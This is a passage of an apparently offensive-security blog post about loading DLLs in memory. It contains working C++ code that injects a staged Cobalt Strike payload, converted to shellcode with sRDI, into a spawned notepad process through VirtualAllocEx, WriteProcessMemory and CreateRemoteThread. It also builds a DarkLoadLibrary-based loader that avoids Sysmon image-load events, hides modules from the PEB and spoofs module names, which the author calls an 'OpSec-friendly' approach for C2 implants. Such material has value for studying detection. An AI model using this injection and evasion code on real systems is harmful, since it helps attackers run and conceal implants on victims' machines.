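The "function hash" in step 3 means the export is looked up by a hash of its name rather than by the string itself. I have not reproduced sRDI's exact routine here; the sketch below is the generic rotate-right-by-13 additive hash that is commonly seen in position-independent loaders, and RotateRight32 and HashName are hypothetical names. Whether sRDI hashes the terminating NUL or the module name as well is not something this sketch tries to answer.

```cpp
#include <cassert>
#include <cstdint>
#include <string>

// Rotates a 32-bit value right by `bits` (valid for 1..31).
uint32_t RotateRight32(uint32_t value, unsigned bits)
{
    assert(bits > 0 && bits < 32);
    return (value >> bits) | (value << (32 - bits));
}

// Generic ROR-13 additive hash over the bytes of a name.
uint32_t HashName(const std::string& name)
{
    uint32_t hash = 0;
    for (unsigned char c : name) {
        hash = RotateRight32(hash, 13); // mix the previous state
        hash += c;                      // fold in the next character
    }
    return hash;
}
```

The loader then walks the export names, hashes each one the same way, and compares integers, which means the function name never has to appear as a string in the shellcode.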

As my DLL is huge, I'll use a Staged Cobalt Strike DLL. Below is the sRDI usage:

usage: ConvertToShellcode.py [-h] [-v] [-f FUNCTION_NAME] [-u USER_DATA] [-c] [-i] [-d IMPORT_DELAY] input_dll

RDI Shellcode Converter

positional arguments:
  input_dll             DLL to convert to shellcode

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -f FUNCTION_NAME, --function-name FUNCTION_NAME
                        The function to call after DllMain
  -u USER_DATA, --user-data USER_DATA
                        Data to pass to the target function
  -c, --clear-header    Clear the PE header on load
  -i, --obfuscate-imports
                        Randomize import dependency load order
  -d IMPORT_DELAY, --import-delay IMPORT_DELAY
                        Number of seconds to pause between loading imports

There are some really cool pieces of functionality here, so I recommend taking a look through ShellcodeRDI.py, but that's not in scope for now.

The Cobalt Strike DLL Entry is Start, and that can be verified by running something like this:

Running sRDI and specifying Start as the FUNCTION_NAME:

This can now be loaded into the injector as shown earlier. Again, for the sake of not crashing my Visual Studio, I'll just read the bytes into memory, as opposed to storing 20,000 bytes:

const char* path = "G:\\Dropbox\\artifact.bin";
LPVOID buf;
DWORD bufSz = ReadBytes((char*)path, &buf);

Because sRDI provides a bootstrap, none of the GetReflectiveLoaderOffset stuff is needed. Below is the injection code:

void remote_exec(DWORD bufSz, LPVOID buf)
{
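    LPSTARTUPINFOA si = new STARTUPINFOA();
    PPROCESS_INFORMATION pi = new PROCESS_INFORMATION();
    si->cb = sizeof(STARTUPINFOA); // CreateProcess expects cb to hold the structure size

    // CreateProcessA returns a BOOL: zero means failure.
    if (!CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, TRUE, 0, NULL, NULL, si, pi))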
    {
        printf("[!] Failed to create process!\n");
        return;
    }
    else
    {
        printf("  :: Process ID: %d\n", pi->dwProcessId);
        printf("  :: Process Handle: %p\n", pi->hProcess);

        LPVOID pAddress = nullptr;
        BOOL bProtect;
        HANDLE hThread;
        DWORD lpflOldProtect = 0;
        DWORD dwLdrOffset = 0;

        pAddress = VirtualAllocEx(pi->hProcess, 0, bufSz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        printf("  :: Base Address: %p\n", pAddress);

        WriteProcessMemory(pi->hProcess, pAddress, buf, bufSz, NULL);
        printf("  :: Bytes Written!\n");

        bProtect = VirtualProtectEx(pi->hProcess, pAddress, bufSz, PAGE_EXECUTE_READ, &lpflOldProtect);
        printf("  :: Set PAGE_EXECUTE_READ\n");

        //dwLdrOffset = GetReflectiveLoaderOffset(buf);
        //printf("  :: Loader Offset: %zd\n", dwLdrOffset);
        //LPTHREAD_START_ROUTINE lpParameter = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);
        //printf("  :: LPTHREAD_START_ROUTINE: %p\n", lpParameter);

        hThread = CreateRemoteThread(pi->hProcess, 0, 0, (LPTHREAD_START_ROUTINE)pAddress, 0, 0, 0);
        printf("  :: Thread: %p\n", hThread);

        WaitForSingleObject(hThread, 5000);

        if (pi->hProcess)CloseHandle(pi->hProcess);
        if (pi->hThread)CloseHandle(pi->hThread);
        if (hThread)CloseHandle(hThread);
    }
    return;
}

Note the commented out code:

//dwLdrOffset = GetReflectiveLoaderOffset(buf);
//printf("  :: Loader Offset: %zd\n", dwLdrOffset);
//LPTHREAD_START_ROUTINE lpParameter = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);
//printf("  :: LPTHREAD_START_ROUTINE: %p\n", lpParameter);

And the thread is created normally:

hThread = CreateRemoteThread(pi->hProcess, 0, 0, (LPTHREAD_START_ROUTINE)pAddress, 0, 0, 0);

Running this code shows notepad.exe being injected into and the DLL being executed:

Similarly to the Reflective DLL, no linked DLL is shown:

Recap

A few tangents later, what has actually been covered? So far, we have:

  1. Looked at loading DLLs from disk and the associated kernel-callback (PsSetLoadImageNotifyRoutine), as well as the DLLs being linked to the PEB.

  2. Poked around some Reflective DLLs

  3. Looked at sRDI and created a little POC.

Moving on!

DarkLoadLibrary

A few weeks ago, batsec posted an excellent blog called Bypassing Image Load Kernel Callbacks on behalf of MDSec. This project looked at the kernel-callbacks associated with loading modules and linking them to the PEB.

What makes this interesting is the following table from the blog:

As long as I haven't misunderstood the library, this only works within the current process and doesn't support any kind of remote process interaction out of the box, which is fine; we will work with that. According to the table, however, there's probably no reason to avoid it: it does it all! Batsec goes on to discuss how this library is essentially the end product of rewriting the Windows library loader from scratch, so kudos to him.

A Quick Test

Below is the example provided:

#include <stdio.h>
#include <windows.h>

#include "pebutils.h"
#include "darkloadlibrary.h"

typedef DWORD (WINAPI * _ThisIsAFunction) (LPCWSTR);

VOID main()
{
    GETPROCESSHEAP pGetProcessHeap = (GETPROCESSHEAP)GetFunctionAddress(IsModulePresent(L"Kernel32.dll"), "GetProcessHeap");
    HEAPFREE pHeapFree = (HEAPFREE)GetFunctionAddress(IsModulePresent(L"Kernel32.dll"), "HeapFree");

    PDARKMODULE DarkModule = DarkLoadLibrary(
        LOAD_LOCAL_FILE,
        L"TestDLL.dll",
        NULL,
        0,
        NULL
    );

    if (!DarkModule->bSuccess)
    {
        printf("load failed: %S\n", DarkModule->ErrorMsg);
        pHeapFree(pGetProcessHeap(), 0, DarkModule->ErrorMsg);
        pHeapFree(pGetProcessHeap(), 0, DarkModule);
        return;
    }

    _ThisIsAFunction ThisIsAFunction = (_ThisIsAFunction)GetFunctionAddress(
        (HMODULE)DarkModule->ModuleBase,
        "CallThisFunction"
    );
    pHeapFree(pGetProcessHeap(), 0, DarkModule);

    if (!ThisIsAFunction)
    {
        printf("failed to find it\n");
        return;
    }

    ThisIsAFunction(L"this is working!!!");

    return;
}

It loads TestDLL.dll, resolves the CallThisFunction export, and calls it through the ThisIsAFunction pointer. Simples.

Some messing about later, I ended up with a small PE that uses both the load options. First off though, the in memory replicator (read it from a file and store in a buffer):

DWORD read_bytes_from_file(LPCWSTR path, LPVOID* buf)
{
    HANDLE hFile;
    DWORD  size, readAmount = 0;

    *buf = NULL;
    hFile = CreateFileW(path, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

    if (hFile != INVALID_HANDLE_VALUE) {
        size = GetFileSize(hFile, NULL);
        // Bail out if the size query or the allocation fails.
        if (size != INVALID_FILE_SIZE && (*buf = malloc((size_t)size + 16)) != NULL) {
            if (!ReadFile(hFile, *buf, size, &readAmount, NULL)) {
                // Do not hand back a half-filled buffer.
                readAmount = 0;
                free(*buf);
                *buf = NULL;
            }
        }
        CloseHandle(hFile);
    }
    return readAmount;
}

A standard wmain:

int wmain(int argc, wchar_t* argv[])
{
    LPCWSTR path;
    int mode = 0;

    if (argc == 3)
    {
        mode = _wtoi(argv[1]); // argv is wchar_t*, so use the wide variant of atoi
        path = argv[2];
    }
    else
    {
        printf("PS> .\\dark-loader.exe <mode> <path>\n");
        printf("PS> .\\dark-loader.exe 1 c:\\file.dll\n");
        printf("PS> .\\dark-loader.exe 2 c:\\file.dll\n");
        printf("\nMODES:\n");
        printf("    - 1: LOAD_LOCAL_FILE: Load a DLL from the file system.\n");
        printf("    - 2: LOAD_MEMORY: Load a DLL from a buffer.\n");
        return -1;
    }

    printf("|> Loading: %ws\n", path);

    local_load_dll(path, mode);

    return 0;
}

DarkLoadLibrary has two options:

  1. LOAD_LOCAL_FILE: Load a DLL from the file system.

  2. LOAD_MEMORY: Load a DLL from a buffer.

Additionally, there is NO_LINK which we will look at later.

For the actual loading function, local_load_dll, we start with a switch to determine which control flag is used:

switch (mode)
{
case 1:
    printf("  :: Setting: LOAD_LOCAL_FILE\n");
    dwFlags = LOAD_LOCAL_FILE;
    break;
case 2:
    printf("  :: Setting: LOAD_MEMORY\n");
    dwFlags = LOAD_MEMORY;
    break;
}
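
To make the flag handling a little more concrete, here is a minimal, portable sketch of how a load type and a modifier such as NO_LINK can share one DWORD. The SK_ names, the numeric values, and the "low 16 bits are the load type" layout are assumptions for illustration only; check darkloadlibrary.h for the real definitions before relying on any of them.

```c
#include <assert.h>
#include <stdint.h>

/* Illustrative values only (assumed, not taken from the library headers). */
#define SK_LOAD_LOCAL_FILE 0x00000001u
#define SK_LOAD_MEMORY     0x00000003u
#define SK_NO_LINK         0x00010000u
#define SK_TYPE_MASK       0x0000FFFFu

/* The low 16 bits select the load type; anything above is a modifier. */
static uint32_t sk_load_type(uint32_t flags)
{
    /* Modifier bits must not overlap the type field. */
    assert((SK_NO_LINK & SK_TYPE_MASK) == 0);
    return flags & SK_TYPE_MASK;
}

/* Linking is the default; it is skipped only when the NO_LINK bit is set. */
static int sk_should_link(uint32_t flags)
{
    return (flags & SK_NO_LINK) == 0;
}

/* Map the command-line mode (1 or 2) to a flag; 0 means "unknown mode". */
static uint32_t sk_flags_from_mode(int mode)
{
    switch (mode) {
    case 1:  return SK_LOAD_LOCAL_FILE;
    case 2:  return SK_LOAD_MEMORY;
    default: return 0;
    }
}
```

Returning 0 for an unknown mode gives the caller something to check before handing the flags to the loader, which the switch above does not do on its own.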

Then, if LOAD_MEMORY is to be used, some values need to be set:

if (mode == 2)
{
    printf("  :: Reading bytes (replicating in-memory loading)!\n");
    dwLen = read_bytes_from_file(lpwBuffer, &lpFileBuffer);
    lpwBuffer = NULL;
    lpwName = L"DarkLoadLibraryDebugging";
    if (dwLen > 0)
    {
        printf("  :: DLL Size: %lu\n", dwLen);
        printf("  :: Loading in as: %ws\n", lpwName);
    }
    else
    {
        printf("[!] Failed to read bytes from file!\n");
        return;
    }
}

The magic bit:

GETPROCESSHEAP pGetProcessHeap = (GETPROCESSHEAP)GetFunctionAddress(IsModulePresent(L"Kernel32.dll"), "GetProcessHeap");
HEAPFREE pHeapFree = (HEAPFREE)GetFunctionAddress(IsModulePresent(L"Kernel32.dll"), "HeapFree");

PDARKMODULE DarkModule = DarkLoadLibrary(dwFlags, lpwBuffer, lpFileBuffer, dwLen, lpwName);

if (DarkModule->bSuccess == FALSE)
{
    printf("[!] %S\n", DarkModule->ErrorMsg);
    pHeapFree(pGetProcessHeap(), 0, DarkModule->ErrorMsg);
    pHeapFree(pGetProcessHeap(), 0, DarkModule);
    return; // match the bare return used by the earlier failure path in this function
}

printf("  :: Module: %p\n", (HMODULE)DarkModule->ModuleBase);

if (pHeapFree(pGetProcessHeap(), 0, DarkModule->ErrorMsg))
{
    printf("  :: Freed DarkModule->ErrorMsg\n");
}
else
{
    printf("[!] Failed to free DarkModule->ErrorMsg!\n");
}
if (pHeapFree(pGetProcessHeap(), 0, DarkModule))
{
    printf("  :: Freed DarkModule\n");
}
else
{
    printf("[!] Failed to free DarkModule\n");
}

DarkLoadLibrary() returns a PDARKMODULE, which is a pointer to a DARKMODULE struct:

typedef struct _DARKMODULE {
    BOOL      bSuccess;
    LPWSTR    ErrorMsg;
    PBYTE     pbDllData;
    DWORD     dwDllDataLen;
    LPWSTR    LocalDLLName;
    PWCHAR    CrackedDLLName;
    ULONG_PTR ModuleBase;
    BOOL      bLinkedToPeb;
} DARKMODULE, *PDARKMODULE;

Depending on the options provided, DarkLoadLibrary will do a few things:

  1. IsValidPE(): Follows e_lfanew from the DOS header to the IMAGE_NT_HEADERS and checks that the Signature is IMAGE_NT_SIGNATURE.

  2. MapSections(): This function does a lot, and is worth a read, but essentially it maps the DLL sections and ensures that all the relocations are handled correctly.

  3. ResolveImports(): Does what it says on the tin. Resolves LoadLibraryA and ensures the DLL has all of its imports correctly resolved.

  4. LinkModuleToPEB(): If NO_LINK is not specified, this function will use LDR_DATA_TABLE_ENTRY2 and AddBaseAddressEntry() to link the module. This is also the function used to spoof the DLL name.

  5. BeginExecution(): This is the actual point of execution, and again, a lot is going on here and it is worth reading. Its purpose, though, boils down to the following:

BOOL ok = DllMain(
    (HINSTANCE)pdModule->ModuleBase,
    DLL_PROCESS_ATTACH,
    (LPVOID)NULL
);
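
As a rough illustration of the first step in that list, the header check can be sketched in portable C against a plain byte buffer. This is not the library's IsValidPE(): the sk_ names are hypothetical, and the bounds checks and the "MZ" check are additions of mine. The offsets and magic values themselves come from the PE format.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define SK_DOS_MAGIC    0x5A4Du      /* "MZ" */
#define SK_NT_SIGNATURE 0x00004550u  /* "PE\0\0" */
#define SK_LFANEW_OFF   0x3Cu        /* offset of e_lfanew in the DOS header */

/* Read little-endian values without relying on alignment or host endianness. */
static uint16_t sk_rd16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

static uint32_t sk_rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns 1 if buf looks like a PE image, 0 otherwise. */
static int sk_is_valid_pe(const uint8_t *buf, size_t len)
{
    assert(buf != NULL);

    /* The buffer must at least hold the DOS header up to e_lfanew. */
    if (len < SK_LFANEW_OFF + 4)
        return 0;
    if (sk_rd16(buf) != SK_DOS_MAGIC)
        return 0;

    /* e_lfanew is the file offset of the NT headers. */
    uint32_t lfanew = sk_rd32(buf + SK_LFANEW_OFF);
    if (lfanew > len || len - lfanew < 4)
        return 0; /* the signature would fall outside the buffer */

    return sk_rd32(buf + lfanew) == SK_NT_SIGNATURE;
}
```

The bounds checks matter most in the LOAD_MEMORY case, where the buffer may come from somewhere less trustworthy than a file you built yourself.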

Experimenting with DarkLoadLibrary

The little tool I put together for this is dark-loader. It supports both load modes and takes a DLL path, which allowed me to quickly verify that various DLLs worked with the library.

Here is the help:

Let's quickly make sure it works across all the use cases:

  1. Standard DLL: LOAD_LOCAL_FILE

  2. Reflective DLL: LOAD_LOCAL_FILE

  3. Standard DLL: LOAD_MEMORY

  4. Reflective DLL: LOAD_MEMORY

DarkLoadLibrary was able to execute both the standard and Reflective DLL from both the local disk and from memory without any issues!

ImageLoad and Linked Modules

The final thing I want to do is quickly go back over the Sysmon Event ID 7 and the PEB Linked Modules.

Updating the PowerShell script for the $loader and the $dll:

$eventId = 7
$logName = "Microsoft-Windows-Sysmon/Operational"

$loader = "dark-loader.exe"
$dll = "debug-dll.dll"

# Only look at events from the last hour
$since = (Get-Date).AddHours(-1)
$events = Get-WinEvent -FilterHashtable @{LogName=$logName; Id=$eventId; StartTime=$since}

$date = Get-Date -Format "yyyy-MM-dd HH"

foreach($event in $events)
{
    $msg = $event.Message.ToString()
    $image = ($msg|Select-String -Pattern 'Image:.*').Matches.Value.Replace("Image: ", "")
    $imageLoaded = ($msg|Select-String -Pattern 'ImageLoaded:.*').Matches.Value.Replace("ImageLoaded: ", "")
    $utcTime = ($msg|Select-String -Pattern 'UtcTime:.*').Matches.Value.Replace("UtcTime: ", "")
   
    if($image.contains($loader) -and $imageLoaded.Contains($dll))
    {
        Write-Host $image loaded $imageLoaded at $utcTime
    }
}

LOAD_LOCAL_FILE

The next screenshot provides no reason to believe this is correct, but no events were found:

The only other way I could prove this is to provide logs or an awkward screenshot of times. But I can't be bothered, so trust me bro.

Checking the linked modules, debug-dll.dll is present:

DarkLoadLibrary also supports NO_LINK, which should remove the above:

dwFlags = LOAD_LOCAL_FILE | NO_LINK;

The DLL executes and debug-dll.dll can no longer be seen in the linked modules.
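
For a rough mental model of why that is, the loader's module lists are circular doubly linked lists, and tools that enumerate modules walk them. The sketch below uses simplified, hypothetical stand-ins (sk_list, sk_module) rather than the real LIST_ENTRY and LDR_DATA_TABLE_ENTRY layouts, and it only models the idea: a module that is never linked in is never found by a walk.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Simplified stand-ins for LIST_ENTRY and a loader table entry. */
typedef struct sk_list { struct sk_list *flink, *blink; } sk_list;
typedef struct sk_module { sk_list links; const char *name; } sk_module;

/* An empty circular list points back at its own head. */
static void sk_list_init(sk_list *head)
{
    head->flink = head->blink = head;
}

/* Similar in spirit to InsertTailList: append the entry just before the head. */
static void sk_link(sk_list *head, sk_module *m)
{
    assert(head != NULL && m != NULL);
    m->links.flink = head;
    m->links.blink = head->blink;
    head->blink->flink = &m->links;
    head->blink = &m->links;
}

/* Walk the list the way a module enumerator would, matching on name. */
static const sk_module *sk_find(const sk_list *head, const char *name)
{
    for (const sk_list *e = head->flink; e != head; e = e->flink) {
        /* links is the first member, so the entry pointer is the module pointer. */
        const sk_module *m = (const sk_module *)e;
        if (strcmp(m->name, name) == 0)
            return m;
    }
    return NULL;
}
```

With NO_LINK, the equivalent of sk_link() is simply never called for the module, so a walk of the list comes back empty even though the code is mapped and running.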

LOAD_MEMORY

Again, no logs found, but trust me bro:

Arbitrary DLL Naming:

Conclusion

Throughout this blog I've been exploring loading DLLs into memory. This covered loading a standard Windows DLL, a custom DLL (MessageBoxA ftw), and Reflective DLLs. My goal was to identify an OpSec-friendly way of loading modules into memory, and the conclusion I've come to is that if the DLL needs to be loaded into a remote process, then the sRDI project (or something similar) is probably the best way. As for the local process, I cannot see any reason not to take inspiration from BatSec's DarkLoadLibrary and utilise a custom loader. The flexibility to load from both disk and memory, as well as supplying a 'spoofed' module name, currently seems unparalleled.

Hopefully I'll get around to it, but I want to do a follow-up blog where I go over a project I've had for a while. It piles onto the C2 Twitter debate by showcasing a method of keeping an implant small while still working well with modularity.

For all the projects used here, see the Pantry.
